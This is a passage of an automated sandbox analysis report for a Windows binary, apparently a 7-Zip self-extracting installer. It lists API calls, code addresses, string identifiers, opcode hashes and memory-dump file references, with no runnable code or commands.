                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$wsprintf
                                                                                                                                                                                                                                                • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                                                                                                                                • API String ID: 2704270482-1550708412
                                                                                                                                                                                                                                                • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                                                                                                                                                                                                • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                                                                • String ID: %%T/$%%T\
                                                                                                                                                                                                                                                • API String ID: 613200358-2679640699
                                                                                                                                                                                                                                                • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                                                                                                                                                                                                • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                                                                • String ID: %%S/$%%S\
                                                                                                                                                                                                                                                • API String ID: 613200358-358529586
                                                                                                                                                                                                                                                • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                                                                                                                                                                                                • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                                                                • String ID: %%M/$%%M\
                                                                                                                                                                                                                                                • API String ID: 613200358-4143866494
                                                                                                                                                                                                                                                • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                                                                                                                                                                                                • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionThrow
                                                                                                                                                                                                                                                • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                                                                                                                                                                                                                                • API String ID: 432778473-803145960
                                                                                                                                                                                                                                                • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                                                                                                                                                                                • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                                                                                                                                                                                                                  • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                                                                                                                                                                  • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                                                                                                                                                                                  • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??2@$??3@$memmove
                                                                                                                                                                                                                                                • String ID: IA$IA$IA
                                                                                                                                                                                                                                                • API String ID: 4294387087-924693538
                                                                                                                                                                                                                                                • Opcode ID: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
                                                                                                                                                                                                                                                • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                                                                                                                                                                                • String ID: IA
                                                                                                                                                                                                                                                • API String ID: 3462485524-3293647318
                                                                                                                                                                                                                                                • Opcode ID: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
                                                                                                                                                                                                                                                • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: wsprintf$ExitProcesslstrcat
                                                                                                                                                                                                                                                • String ID: 0x%p
                                                                                                                                                                                                                                                • API String ID: 2530384128-1745605757
                                                                                                                                                                                                                                                • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                                                                                                                                                                                                • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                                                                                                                                                                                                                  • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MetricsSystem$??3@
                                                                                                                                                                                                                                                • String ID: 100%%
                                                                                                                                                                                                                                                • API String ID: 2562992111-568723177
                                                                                                                                                                                                                                                • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                                                                                                                                                                                                • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
APIs
• wsprintfW.USER32 ref: 00407A12
  • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
  • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
• GetDlgItem.USER32(?,000004B3), ref: 004079C6
  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
• ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: TextWindow$ItemLength$??3@wsprintf
• String ID: (%u%s)
APIs
• LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
• GetProcAddress.KERNEL32(00000000), ref: 00402211
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32
APIs
• LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
• GetProcAddress.KERNEL32(00000000), ref: 0040219F
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32
APIs
• LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
• GetProcAddress.KERNEL32(00000000), ref: 004021D1
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
  • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
• ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$ByteCharMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1731127917-0
                                                                                                                                                                                                                                                • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                                                                                                                                                                                                • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00403FFB
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: PathTemp$AttributesFilewsprintf
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1746483863-0
                                                                                                                                                                                                                                                • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                                                                                                                                                                                • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharUpperW.USER32(?,7591E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                                                                                                                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                                                                                                                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                                                                                                                                                                                                                                • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharUpper
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 9403516-0
                                                                                                                                                                                                                                                • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
